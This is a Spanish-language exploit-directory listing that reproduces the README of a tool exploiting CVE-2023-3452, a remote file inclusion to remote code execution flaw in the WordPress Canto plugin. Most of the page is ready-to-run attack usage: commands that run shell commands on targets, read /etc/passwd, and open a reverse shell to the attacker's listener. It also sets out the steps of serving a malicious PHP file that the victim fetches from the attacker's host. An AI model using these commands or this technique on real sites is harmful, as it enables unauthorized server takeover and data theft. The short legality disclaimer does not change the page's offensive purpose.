Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
CVE-2023-3452---WordPress-Canto-Plugin-RCE — Exploit de CVE-2023-3452 para el plugin Canto de WordPress con RCE, soporte HTTPS incluido | Kitploit
Herramientas/GitHubGitHub/alpastx/cve-2023-3452---wordpress-canto-plugin-rce
Generación de PayloadsAnálisis de VulnerabilidadesExplotaciónExplotación de Aplicaciones WebPruebas de PenetraciónHerramienta de Acceso Remoto
GitHubalpastx/cve-2023-3452---wordpress-canto-plugin-rce

CVE-2023-3452---WordPress-Canto-Plugin-RCE

Exploit de CVE-2023-3452 para el plugin Canto de WordPress con RCE, soporte HTTPS incluido

Ver Repositorio
1hace 6 mesesAún no revisado

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

CVE-2023-3452 - Plugin Canto de WordPress RCE

Exploit para la vulnerabilidad RFI del Plugin Canto de WordPress (≤ 3.0.4). Funciona realmente en HTTPS — los otros PoCs públicos básicamente se rindieron con SSL.

Créditos donde corresponden: este CVE fue encontrado por otros. Solo hice una versión que no falla en objetivos HTTPS.

Vulnerabilidad

CVECVE-2023-3452
EDB-ID51826
TipoInclusión Remota de Archivos (RFI) → Ejecución Remota de Comandos sin autenticación
AfectadoWordPress Canto Plugin < 3.0.5 (≤ 3.0.4)
Reportado porLeopoldo Angulo (leoanggal1) — 2024-02-27
Ubicación/wp-content/plugins/canto/includes/lib/download.php
Vectorwp_abspath se usa para incluir archivos PHP sin validación — nosotros incluimos el nuestro remotamente.

¿Por qué esta versión?

La mayoría de exploits para este CVE fallan en HTTPS debido a la verificación SSL. Este script:

  • Usa verify=False para que los objetivos HTTPS funcionen realmente
  • Suprime el spam de advertencias de urllib3
  • Funciona igual en HTTP y HTTPS — no se necesita configuración separada

Requisitos

  • Python 3.6+
  • requests

Instalación

root@kitploit:~
pip install -r requirements.txt

O simplemente: pip install requests

Uso

root@kitploit:~
python3 canto_exploit.py -t <TARGET_URL> -l <LHOST> -p <LPORT> [OPCIONES]

Argumentos

OpciónDescripciónRequerido
-t, --targetURL objetivo de WordPress (HTTP o HTTPS)Sí
-l, --lhostTu IP — el objetivo necesita poder alcanzarla para el payloadSí
-p, --lportPuerto del servidor de payload (por defecto: 8888)No
-c, --commandComando a ejecutar en el objetivoNo*
--revshellGenerar reverse shellNo
--shell-portPuerto de escucha para reverse shell (por defecto: 4444)No
-i, --interactiveModo de shell interactivoNo
-v, --verboseSalida adicionalNo
--skip-checkSaltar la comprobación de vulnerabilidadNo

* Sin comando = ejecuta id; whoami; hostname como comprobación de cordura

Ejemplos

Comando único:

root@kitploit:~
python3 canto_exploit.py -t https://target.com -l 10.10.14.33 -p 8888 -c "id"

Leer un archivo:

root@kitploit:~
python3 canto_exploit.py -t https://target.com -l 10.10.14.33 -p 8888 -c "cat /etc/passwd"

Reverse shell (ejecuta nc -lvnp 4444 primero):

root@kitploit:~
python3 canto_exploit.py -t https://target.com -l 10.10.14.33 -p 8888 --revshell --shell-port 4444

Modo interactivo:

root@kitploit:~
python3 canto_exploit.py -t https://target.com -l 10.10.14.33 -p 8888 -i

Objetivo HTTPS CTF:

root@kitploit:~
python3 canto_exploit.py -t https://10.129.1.136 -l 10.10.14.33 -p 8888 -c "id"

Cómo funciona

  1. Comprobación — Accede a /wp-content/plugins/canto/readme.txt, analiza la versión (≤ 3.0.4 = vulnerable)
  2. Payload — Escribe un falso wp-admin/admin.php que ejecuta tu comando mediante system()
  3. Servir — Inicia un servidor HTTP local para que el objetivo pueda obtener nuestro archivo
  4. Disparador — Solicita download.php con wp_abspath=http://LHOST:LPORT para que incluya nuestro PHP remoto
  5. Ejecución — Su servidor ejecuta nuestro código, obtenemos la salida

Notas de red

  • El objetivo debe poder alcanzar tu máquina en LHOST:LPORT (para HTB/labs, esa es tu IP de VPN)
  • El firewall debe permitir tráfico entrante en el puerto del payload (-p)

Descargo de responsabilidad

Solo pruebas autorizadas y educación. Solo toca sistemas que tengas permiso. Cualquier otra cosa es ilegal.

Licencia

MIT

Descargar herramienta